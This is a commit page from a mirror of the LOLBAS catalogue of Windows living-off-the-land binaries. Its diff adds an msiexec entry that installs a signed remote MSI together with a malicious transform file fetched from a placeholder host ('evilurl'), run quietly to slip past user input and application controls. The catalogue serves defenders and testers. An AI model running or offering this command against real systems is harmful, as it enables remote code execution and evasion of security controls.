public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-10-22 16:49:11 +02:00
Code Issues Projects Releases Wiki Activity

Update Msiexec.yml (#333)

Browse Source 
* Update Msiexec.yml

Added transform file execution

* Update Msiexec.yml
This commit is contained in:
pfiatde 2023-11-06 13:47:04 +01:00 committed by GitHub
parent 760151b598
commit ee78111254
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
yml/OSBinaries/Msiexec.yml
View File

@ -32,6 +32,13 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe
@ -46,6 +53,7 @@ Detection:
Resources: Resources:
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
- Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html
Acknowledgement: Acknowledgement:
- Person: netbiosX - Person: netbiosX
Handle: '@netbiosX' Handle: '@netbiosX'